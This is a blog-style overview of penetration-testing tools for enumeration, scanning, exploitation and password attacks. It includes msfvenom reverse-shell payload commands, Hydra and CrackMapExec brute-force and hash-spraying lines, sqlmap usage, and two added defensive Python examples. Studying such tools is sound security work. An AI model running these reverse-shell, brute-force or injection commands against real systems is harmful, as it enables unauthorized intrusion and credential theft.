Essential Tools for Penetration Testers

Enumeration

Information gathering and enumeration is the first stage of a penetration test. Enumerating with a few open-source tools speeds up the process. Here are some tools commonly used by ethical hackers for enumeration.

Dmitry

Dmitry can look up common information about a host from various sources, such as netcraft.com.

Basic usage:

# whois lookup, netcraft host search, subdomain search, email address search
dmitry -i -n -s -e rednode.com

Download: https://github.com/jaygreig86/dmitry

DnsEnum

This is a tool to discover subdomains.

Basic Usage:

dnsenum -u a rednode.com

Download: https://github.com/fwaeytens/dnsenum

Amass

One of my favourite information gathering tools. It is developed by OWASP.

Basic usage:

amass intel -d owasp.org -whois

# Enumerate all subdomains (passive sources only)
amass enum -passive -d owasp.org

Download: https://github.com/OWASP/Amass

Metagoofil

Metagoofil extracts metadata from documents published by the target, such as pdf, doc, ppt and xls files.

Basic Usage:

metagoofil -d rednode.com -t pdf,ppt,xls

Download: https://github.com/opsdisk/metagoofil

Nmap

Nmap is the most popular tool used by both bad and good hackers. Basically, it is used to scan for open ports, identify live hosts and OS versions, and sometimes it can even be used to discover vulnerabilities.

Basic Usage:

Scan all ports

nmap -p 1-65535 rednode.com
nmap -p- rednode.com

Scan for OS and Service Version

nmap -p 1-65535 -O --osscan-guess -sV rednode.com

Scan with default nmap script

nmap -p 1-65535 -sC rednode.com

Vulnerability Scanning

nmap -Pn --script vuln rednode.com

Download: https://nmap.org/download.html

GoBuster

Usually, I use Gobuster to brute force website directories and files, and subdomains.

gobuster dir -u $target -t 15 -w /usr/share/dirb/wordlists/common.txt -x php,txt,conf

Discovering Vulnerability

To exploit a target, a penetration tester needs to find an exploitable vulnerability. No tool is 100% accurate, but these pentesting tools obviously help. Personally I don't use many vulnerability scanning tools. Still, I will list some reliable and tested vulnerability scanners here for future reference!

Nessus

Nessus is the most popular commercial vulnerability scanner. Nessus can be used to scan for network and web vulnerabilities.

More information: https://www.tenable.com/downloads/

Burp Suite Pro

This is a semi-manual web pentesting tool. If you are a web penetration tester, the only tool you need is Burp Suite Pro. The free version of Burp Suite is also good, but I find it very slow, and some additional features are not included.

I will post another article on the usage of Burp Suite.

Don't get me wrong: I don't think you need many tools to scan for vulnerabilities as long as you have GitHub, Exploit-DB, and Google. The information you gather can be used to find vulnerabilities manually.

More Information: https://portswigger.net/burp/pro

WpScan

This is a tool to find vulnerabilities in the WordPress CMS. Usually it does not fuzz anything; it looks for versions and compares them with its own database.

wpscan -e vp --plugins-detection aggressive --url $target

Download: https://github.com/wpscanteam/wpscan

Exploitation

It is unlikely that an exploit exists for every possible vulnerability unless the vulnerability is well known. Usually a white hat hacker or red teamer does not depend on pre-built tools. But there are some tools that are extremely helpful for exploitation.

Metasploit

This is the tool used by good and bad hackers for information gathering and to exploit some well-known vulnerabilities. I believe the Metasploit framework is used for 4 purposes:

  1. Reverse Shell Generator
  2. Shellcode Generator
  3. Information Gathering
  4. Vulnerability Exploitation

Generate a Reverse Shell payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x64.exe

Generate reverse shell shellcode (the -b option excludes the null byte as a bad character, which is why an encoder is chosen in the output below):

msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -b "\x00" LPORT=4444 -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 503 (iteration=0)
x64/xor chosen with final size 503
Payload size: 503 bytes
Final size of py file: 2452 bytes

I will publish another article on metasploit usage.

SET

SET (Social-Engineer Toolkit) is an open-source tool that helps an attacker exploit the human element.

setoolkit
 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

Download: https://github.com/trustedsec/social-engineer-toolkit

SQLMAP

Sqlmap is the most complete and advanced open-source SQL injection exploitation tool out there. I don't think I need to describe sqlmap in detail, since there is already a lot of information about it on the Internet.

Basic Usage:

python3 sqlmap.py -hh
python3 sqlmap.py -u https://rednode.com/hack.page?vuln=query

Download: https://github.com/sqlmapproject/sqlmap

Search for exploits in different sources:

  1. Search Exploit On Github
  2. Search Exploit On Exploit-db
  3. Search Exploit On Packet Storm Security

Password Attack

A penetration tester needs reliable tools for effective password attacks. Successful password cracking depends on how good you are at building a good wordlist. Here are some tools I mostly use.

Cewl

CeWL is a tool that spiders the target website and creates a custom wordlist for brute force attacks.

cewl -d 3 -w dict.txt -e https://rednode.com

Download: https://github.com/digininja/CeWL

CUPP

A password is weak when people combine personal information in it, such as a name and birth year (like John1980). CUPP helps to create a wordlist by combining personal information.

Basic Usage:

cupp -i
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | [email protected] ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: RedTm
> Surname: 
> Nickname: 
> Birthdate (DDMMYYYY): 01121901

Download: https://github.com/Mebus/cupp
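The defender's counterpart to the weakness described above, as an added example (not CUPP's code or the post's own): a password-policy check that rejects passwords built from the same profile data CUPP asks for (names, nickname, DDMMYYYY birthdate), including leet-spelled and reversed variants. The token rules and the 3-character minimum are assumptions of this example.

```python
"""Added example (not CUPP's or the post's code): a password-policy check that
rejects passwords built from the same personal data CUPP asks for."""
import re

# Leet substitutions a profiler-based wordlist applies; we undo them before comparing.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})


def normalized_forms(s: str) -> tuple[str, str]:
    """Return (raw, deleet). raw keeps digits so '1980' still matches a birth year;
    deleet undoes leet substitutions so 'J0hn' still matches 'john'."""
    raw = re.sub(r"[^a-z0-9]", "", s.lower())
    deleet = re.sub(r"[^a-z0-9]", "", s.lower().translate(LEET))
    return raw, deleet


def profile_tokens(first: str, surname: str, nickname: str, birthdate: str) -> set[str]:
    """Personal tokens a profiler would combine. birthdate is DDMMYYYY, as CUPP asks.
    Tokens shorter than 3 characters (e.g. a two-digit year) are dropped so that
    every password containing two digits is not flagged (assumed threshold)."""
    tokens = {normalized_forms(t)[0] for t in (first, surname, nickname) if t}
    if re.fullmatch(r"\d{8}", birthdate):
        dd, mm, yyyy = birthdate[:2], birthdate[2:4], birthdate[4:]
        tokens |= {yyyy, dd + mm, mm + dd, dd + mm + yyyy}
    return {t for t in tokens if len(t) >= 3}


def personal_info_in_password(password: str, tokens: set[str]) -> list[str]:
    """Return the profile tokens found in the password, forwards or reversed,
    in either normalized form."""
    forms = normalized_forms(password)
    return sorted(t for t in tokens
                  if any(t in f or t[::-1] in f for f in forms))


def is_acceptable(password: str, first: str, surname: str = "",
                  nickname: str = "", birthdate: str = "") -> bool:
    """Policy: reject any password containing a token derived from the user's profile."""
    tokens = profile_tokens(first, surname, nickname, birthdate)
    return not personal_info_in_password(password, tokens)


if __name__ == "__main__":
    # The post's own example of a weak pattern: name + birth year.
    print(is_acceptable("John1980", "John", birthdate="01011980"))             # False
    print(is_acceptable("J0hn!80", "John", birthdate="01011980"))              # False
    print(is_acceptable("correct horse battery", "John", birthdate="01011980"))  # True
```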

Hydra

Hydra is a fast online password cracker. It can brute force the following services:

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
 HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY,
 HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST,
 HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener,
 Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin,
 Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5,
 SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth,
 VNC and XMPP.

Basically, I use this tool for quick brute forcing of FTP, HTTP/HTTPS (head/get/post/form), SSH, and sometimes other services. If someone is looking for an online password cracker, Hydra is good enough.

Usage example:

hydra -l admin -P dictionary.txt -t 20 ftp://rednode.com

But if I need to brute force a web login form, I usually use Burp Suite Pro!

Download: https://github.com/vanhauser-thc/thc-hydra
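The defender's view of the run above, as an added example (not Hydra's code or the post's own): a small detector that flags the burst of failed logins an online guessing run with parallel connections leaves in OpenSSH auth logs. The log lines, host name and addresses are constructed for the example; the threshold and window are assumptions.

```python
"""Added example (not Hydra's or the post's code): flag the failed-login burst an
online guessing tool produces, using OpenSSH auth-log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in the syslog format sshd writes to /var/log/auth.log.
# 203.0.113.5 and 198.51.100.7 are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
Mar 10 12:00:01 bastion sshd[2101]: Failed password for admin from 203.0.113.5 port 50001 ssh2
Mar 10 12:00:01 bastion sshd[2102]: Failed password for admin from 203.0.113.5 port 50002 ssh2
Mar 10 12:00:01 bastion sshd[2103]: Failed password for invalid user root from 203.0.113.5 port 50003 ssh2
Mar 10 12:00:02 bastion sshd[2104]: Failed password for admin from 203.0.113.5 port 50004 ssh2
Mar 10 12:00:02 bastion sshd[2105]: Accepted publickey for deploy from 198.51.100.7 port 41000 ssh2
Mar 10 12:00:02 bastion sshd[2106]: Failed password for admin from 203.0.113.5 port 50005 ssh2
Mar 10 12:00:03 bastion sshd[2107]: Failed password for admin from 203.0.113.5 port 50006 ssh2
Mar 10 12:09:00 bastion sshd[2108]: Failed password for alice from 198.51.100.7 port 41001 ssh2
"""

FAILED = re.compile(
    r"^(\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse_failures(log: str) -> list[tuple[datetime, str, str]]:
    """Return (timestamp, username, source_ip) for each failed-password line, sorted.
    Syslog timestamps carry no year, so ordering assumes all lines share one year."""
    out = []
    for line in log.splitlines():
        m = FAILED.match(line)
        if m:
            out.append((datetime.strptime(m.group(1), "%b %d %H:%M:%S"), m.group(2), m.group(3)))
    return sorted(out)


def detect_bursts(log: str, threshold: int = 5, window_seconds: int = 60) -> dict[str, dict]:
    """Flag every source with at least `threshold` failures inside a sliding window.
    Parallel connections (the post runs Hydra with -t 20) land many failures in the
    same second, so a short window with a low threshold is enough to catch them."""
    recent = defaultdict(deque)   # source_ip -> failure timestamps still inside the window
    users = defaultdict(set)      # source_ip -> usernames tried (spraying shows many)
    flagged = {}
    for ts, user, ip in parse_failures(log):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = {"failures_in_window": len(q), "users": sorted(users[ip]),
                           "window_end": ts.strftime("%b %d %H:%M:%S")}
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures_in_window']} failures, users {info['users']}")
```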

CrackMapExec

This is another small password brute forcer; it can brute force SSH, SMB, LDAP, MSSQL, and WinRM.

Usage example:

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce

HashCat

Hashcat is fast and is my favourite password hash cracker.

hashcat --help
hashcat (v6.2.5) starting in help mode

Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

- [ Options ] -

 Options Short / Long           | Type | Description                                          | Example
================================+======+======================================================+=======================
 -m, --hash-type                | Num  | Hash-type, references below (otherwise autodetect)   | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3
 -V, --version                  |      | Print version                                        |
 -h, --help                     |      | Print help                                           |
     --quiet                    |      | Suppress output                                      |
     --hex-charset              |      | Assume charset is given in hex                       |
     --hex-salt                 |      | Assume salt is given in hex                          |
     --hex-wordlist             |      | Assume words in wordlist are given in hex            |
     --force                    |      | Ignore warnings                                      |
     --deprecated-check-disable |      | Enable deprecated plugins                            |
     --status                   |      | Enable automatic update of the status screen         |
     --status-json              |      | Enable JSON format for status output                 |
     --status-timer             | Num  | Sets seconds between status screen updates to X      | --status-timer=1
     --stdin-timeout-abort      | Num  | Abort if there is no input from stdin for X seconds  | --stdin-timeout-abort=300
     --machine-readable         |      | Display the status view in a machine-readable format |
     --keep-guessing            |      | Keep guessing the hash after it has been cracked     |
     --self-test-disable        |      | Disable self-test functionality on startup           |
     --loopback                 |      | Add new plains to induct directory                   |
     --markov-hcstat2           | File | Specify hcstat2 file to use                          | --markov-hcstat2=my.hcstat2
     --markov-disable           |      | Disables markov-chains, emulates classic brute-force |
     --markov-classic           |      | Enables classic markov-chains, no per-position       |
 -t, --markov-threshold         | Num  | Threshold X when to stop accepting new markov-chains | -t 50
     --runtime                  | Num  | Abort session after X seconds of runtime             | --runtime=10
     --session                  | Str  | Define specific session name                         | --session=mysession
     --restore                  |      | Restore session from --session                       |
     --restore-disable          |      | Do not write restore file                            |
     --restore-file-path        | File | Specific path to restore file                        | --restore-file-path=x.restore
 -o, --outfile                  | File | Define outfile for recovered hash                    | -o outfile.txt
     --outfile-format           | Str  | Outfile format to use, separated with commas         | --outfile-format=1,3
     --outfile-autohex-disable  |      | Disable the use of $HEX[] in output plains           |
     --outfile-check-timer      | Num  | Sets seconds between outfile checks to X             | --outfile-check=30
     --wordlist-autohex-disable |      | Disable the conversion of $HEX[] from the wordlist   |
 -p, --separator                | Char | Separator char for hashlists and outfile             | -p :
     --stdout                   |      | Do not crack a hash, instead print candidates only   |
     --show                     |      | Compare hashlist with potfile; show cracked hashes   |
     --left                     |      | Compare hashlist with potfile; show uncracked hashes |
     --username                 |      | Enable ignoring of usernames in hashfile             |
     --remove                   |      | Enable removal of hashes once they are cracked       |
     --remove-timer             | Num  | Update input hash file each X seconds                | --remove-timer=30
     --potfile-disable          |      | Do not write potfile                                 |
     --potfile-path             | File | Specific path to potfile                             | --potfile-path=my.pot
     --encoding-from            | Code | Force internal wordlist encoding from X              | --encoding-from=iso-8859-15
     --encoding-to              | Code | Force internal wordlist encoding to X                | --encoding-to=utf-32le
     --debug-mode               | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode=4
     --debug-file               | File | Output file for debugging rules                      | --debug-file=good.log
     --induction-dir            | Dir  | Specify the induction directory to use for loopback  | --induction=inducts
     --outfile-check-dir        | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir=x
     --logfile-disable          |      | Disable the logfile                                  |
     --hccapx-message-pair      | Num  | Load only message pairs from hccapx matching X       | --hccapx-message-pair=2
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16
     --keyboard-layout-mapping  | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
     --truecrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --truecrypt-keyf=x.png
     --veracrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --veracrypt-keyf=x.txt
     --veracrypt-pim-start      | Num  | VeraCrypt personal iterations multiplier start       | --veracrypt-pim-start=450
     --veracrypt-pim-stop       | Num  | VeraCrypt personal iterations multiplier stop        | --veracrypt-pim-stop=500
 -b, --benchmark                |      | Run benchmark of selected hash-modes                 |
     --benchmark-all            |      | Run benchmark of all hash-modes (requires -b)        |
     --speed-only               |      | Return expected speed of the attack, then quit       |
     --progress-only            |      | Return ideal progress step size and time to process  |
 -c, --segment-size             | Num  | Sets size in MB to cache from the wordfile to X      | -c 32
     --bitmap-min               | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min=24
     --bitmap-max               | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-max=24
     --cpu-affinity             | Str  | Locks to CPU devices, separated with commas          | --cpu-affinity=1,2,3
     --hook-threads             | Num  | Sets number of threads for a hook (per compute unit) | --hook-threads=8
     --hash-info                |      | Show information for each hash-mode                  |
     --example-hashes           |      | Alias of --hash-info                                 |
     --backend-ignore-cuda      |      | Do not try to open CUDA interface on startup         |
     --backend-ignore-opencl    |      | Do not try to open OpenCL interface on startup       |
 -I, --backend-info             |      | Show info about detected backend API devices         | -I
 -d, --backend-devices          | Str  | Backend devices to use, separated with commas        | -d 1
 -D, --opencl-device-types      | Str  | OpenCL device-types to use, separated with commas    | -D 1
 -O, --optimized-kernel-enable  |      | Enable optimized kernels (limits password length)    |
 -M, --multiply-accel-disable   |      | Disable multiply kernel-accel with processor count   |
 -w, --workload-profile         | Num  | Enable a specific workload profile, see pool below   | -w 3
 -n, --kernel-accel             | Num  | Manual workload tuning, set outerloop step size to X | -n 64
 -u, --kernel-loops             | Num  | Manual workload tuning, set innerloop step size to X | -u 256
 -T, --kernel-threads           | Num  | Manual workload tuning, set thread count to X        | -T 64
     --backend-vector-width     | Num  | Manually override backend vector-width to X          | --backend-vector=4
     --spin-damp                | Num  | Use CPU for device synchronization, in percent       | --spin-damp=10
     --hwmon-disable            |      | Disable temperature and fanspeed reads and triggers  |
     --hwmon-temp-abort         | Num  | Abort if temperature reaches X degrees Celsius       | --hwmon-temp-abort=100
     --scrypt-tmto              | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto=3
 -s, --skip                     | Num  | Skip X words from the start                          | -s 1000000
 -l, --limit                    | Num  | Limit X words from the start + skipped words         | -l 1000000
     --keyspace                 |      | Show keyspace base:mod values and quit               |
 -j, --rule-left                | Rule | Single rule applied to each word from left wordlist  | -j 'c'
 -k, --rule-right               | Rule | Single rule applied to each word from right wordlist | -k '^-'
 -r, --rules-file               | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule
 -g, --generate-rules           | Num  | Generate X random rules                              | -g 10000
     --generate-rules-func-min  | Num  | Force min X functions per rule                       |
     --generate-rules-func-max  | Num  | Force max X functions per rule                       |
     --generate-rules-func-sel  | Str  | Pool of rule operators valid for random rule engine  | --generate-rules-func-sel=ioTlc
     --generate-rules-seed      | Num  | Force RNG seed set to X                              |
 -1, --custom-charset1          | CS   | User-defined charset ?1                              | -1 ?l?d?u
 -2, --custom-charset2          | CS   | User-defined charset ?2                              | -2 ?l?d?s
 -3, --custom-charset3          | CS   | User-defined charset ?3                              |
 -4, --custom-charset4          | CS   | User-defined charset ?4                              |
     --identify                 |      | Shows all supported algorithms for input hashes      | --identify my.hash
 -i, --increment                |      | Enable mask increment mode                           |
     --increment-min            | Num  | Start mask incrementing at X                         | --increment-min=4
     --increment-max            | Num  | Stop mask incrementing at X                          | --increment-max=8
 -S, --slow-candidates          |      | Enable slower (but advanced) candidate generators    |
     --brain-server             |      | Enable brain server                                  |
     --brain-server-timer       | Num  | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
 -z, --brain-client             |      | Enable brain client, activates -S                    |
     --brain-client-features    | Num  | Define brain client features, see below              | --brain-client-features=3
     --brain-host               | Str  | Brain server host (IP or domain)                     | --brain-host=127.0.0.1
     --brain-port               | Port | Brain server port                                    | --brain-port=13743
     --brain-password           | Str  | Brain server authentication password                 | --brain-password=bZfhCvGUSjRq
     --brain-session            | Hex  | Overrides automatically calculated brain session     | --brain-session=0x2ae611db
     --brain-session-whitelist  | Hex  | Allow given sessions only, separated with commas     | --brain-session-whitelist=0x2ae611db

The usage example can be found here.

Download: https://github.com/hashcat/hashcat

Other Interesting Tools

  1. Aircrack-ng suite for wireless pentesting: https://www.aircrack-ng.org/
  2. Wireshark, the network sniffer: https://www.wireshark.org/download.html
  3. SqlNinja (another SQL injection tool): http://sqlninja.sourceforge.net/index.html
  4. BeEF (beef-xss) for exploiting XSS and browsers: https://github.com/beefproject/beef/
  5. SecLists (fuzzing payloads and wordlists): https://github.com/danielmiessler/SecLists

Commercial Tools

There are also some good commercial tools in use. Well-known ones are:

  1. Core Impact: the most popular commercial tool.
  2. Canvas: another commercial tool, written in Python.
  3. Metasploit Pro: the professional version of Metasploit.